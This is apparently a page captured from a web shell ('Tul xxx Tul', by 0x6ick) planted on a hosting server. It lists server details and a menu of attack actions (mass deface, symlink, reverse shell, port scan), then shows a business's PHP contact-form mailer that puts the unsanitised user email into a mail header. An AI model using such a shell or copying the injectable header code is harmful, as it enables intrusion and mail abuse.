Tul xxx Tul
User / IP
:
216.73.216.217
Host / Server
:
45.84.207.204 / aircan.me
System
:
Linux lt-bnk-web1726.main-hosting.eu 5.14.0-611.36.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Tue Mar 3 11:23:52 EST 2026 x86_64
Command
|
Upload
|
Create
Mass Deface
|
Jumping
|
Symlink
|
Reverse Shell
Ping
|
Port Scan
|
DNS Lookup
|
Whois
|
Header
|
cURL
:
/
home
/
u931257429
/
domains
/
emprendo.com.co
/
public_html
/
larueda
/
campañamundial
/
Viewing: notificar.php
<?php header('Content-Type: application/json'); header('Access-Control-Allow-Origin: *'); header('Access-Control-Allow-Methods: POST'); header('Access-Control-Allow-Headers: Content-Type'); // Configuración $destinatario = "contacto@emprendo.com.co"; // Cambiar por el email real $asunto = "Nueva Solicitud de Cotización - Reels La Rueda"; // Recibir datos $data = json_decode(file_get_contents('php://input'), true); if (!$data) { echo json_encode(['success' => false, 'message' => 'No se recibieron datos']); exit; } // Validar campos requeridos if (empty($data['nombre']) || empty($data['email']) || empty($data['telefono'])) { echo json_encode(['success' => false, 'message' => 'Faltan campos requeridos']); exit; } // Construir el mensaje $mensaje = " <html> <head> <style> body { font-family: Arial, sans-serif; line-height: 1.6; color: #333; } .container { max-width: 600px; margin: 0 auto; padding: 20px; } .header { background: linear-gradient(135deg, #ff3900, #ff6a00); color: white; padding: 30px; text-align: center; border-radius: 10px 10px 0 0; } .content { background: #f9f9f9; padding: 30px; border-radius: 0 0 10px 10px; } .field { margin-bottom: 15px; padding: 15px; background: white; border-radius: 8px; } .label { font-weight: bold; color: #ff3900; margin-bottom: 5px; } .value { color: #333; } .footer { text-align: center; margin-top: 30px; padding-top: 20px; border-top: 2px solid #eee; color: #999; font-size: 12px; } .total { font-size: 24px; font-weight: bold; color: #10b981; text-align: center; padding: 20px; background: white; border-radius: 8px; margin: 20px 0; } </style> </head> <body> <div class='container'> <div class='header'> <h1>🎬 Nueva Solicitud de Cotización</h1> <p>Producción de Reels para La Rueda</p> </div> <div class='content'> <div class='field'> <div class='label'>👤 Nombre:</div> <div class='value'>" . htmlspecialchars($data['nombre']) . "</div> </div> <div class='field'> <div class='label'>📧 Email:</div> <div class='value'>" . htmlspecialchars($data['email']) . "</div> </div> <div class='field'> <div class='label'>📱 Teléfono:</div> <div class='value'>" . htmlspecialchars($data['telefono']) . "</div> </div> <div class='field'> <div class='label'>🏢 Empresa:</div> <div class='value'>" . htmlspecialchars($data['empresa']) . "</div> </div> <div class='field'> <div class='label'>🎥 Reels Seleccionados:</div> <div class='value'>" . htmlspecialchars($data['reels']) . "</div> </div> <div class='total'> 💰 Total: " . htmlspecialchars($data['total']) . " </div> <div class='field'> <div class='label'>💬 Comentarios:</div> <div class='value'>" . nl2br(htmlspecialchars($data['comentarios'])) . "</div> </div> <div class='field'> <div class='label'>📅 Fecha de Solicitud:</div> <div class='value'>" . htmlspecialchars($data['fecha']) . "</div> </div> </div> <div class='footer'> <p>Este email fue generado automáticamente desde la página de propuesta comercial</p> <p>eMprendo • Producción de Contenido Digital</p> </div> </div> </body> </html> "; // Headers para HTML $headers = "MIME-Version: 1.0" . "\r\n"; $headers .= "Content-type:text/html;charset=UTF-8" . "\r\n"; $headers .= "From: Propuesta La Rueda <noreply@emprendo.com.co>" . "\r\n"; $headers .= "Reply-To: " . $data['email'] . "\r\n"; // Enviar email $enviado = mail($destinatario, $asunto, $mensaje, $headers); // También enviar copia al cliente $asuntoCliente = "Confirmación de Solicitud - Reels La Rueda"; $mensajeCliente = " <html> <head> <style> body { font-family: Arial, sans-serif; line-height: 1.6; color: #333; } .container { max-width: 600px; margin: 0 auto; padding: 20px; } .header { background: linear-gradient(135deg, #ff3900, #ff6a00); color: white; padding: 30px; text-align: center; border-radius: 10px 10px 0 0; } .content { background: #f9f9f9; padding: 30px; border-radius: 0 0 10px 10px; } .message { background: white; padding: 20px; border-radius: 8px; margin: 20px 0; } .footer { text-align: center; margin-top: 30px; padding-top: 20px; border-top: 2px solid #eee; color: #999; font-size: 12px; } </style> </head> <body> <div class='container'> <div class='header'> <h1>✓ Solicitud Recibida</h1> <p>Gracias por tu interés en nuestros servicios</p> </div> <div class='content'> <div class='message'> <p>Hola <strong>" . htmlspecialchars($data['nombre']) . "</strong>,</p> <p>Hemos recibido tu solicitud de cotización para la producción de reels promocionales.</p> <p><strong>Reels seleccionados:</strong> " . htmlspecialchars($data['reels']) . "</p> <p><strong>Total estimado:</strong> " . htmlspecialchars($data['total']) . "</p> <p>Nuestro equipo revisará tu solicitud y se pondrá en contacto contigo en las próximas 24 horas para brindarte una cotización detallada y resolver cualquier duda.</p> <p>Si tienes alguna pregunta urgente, no dudes en contactarnos directamente.</p> <p>¡Gracias por confiar en eMprendo!</p> </div> </div> <div class='footer'> <p>eMprendo • Producción de Contenido Digital</p> <p>contacto@emprendo.com.co</p> </div> </div> </body> </html> "; mail($data['email'], $asuntoCliente, $mensajeCliente, $headers); // Responder if ($enviado) { echo json_encode(['success' => true, 'message' => 'Cotización enviada correctamente']); } else { echo json_encode(['success' => false, 'message' => 'Error al enviar el email']); } ?>
Coded With 💗 by
0x6ick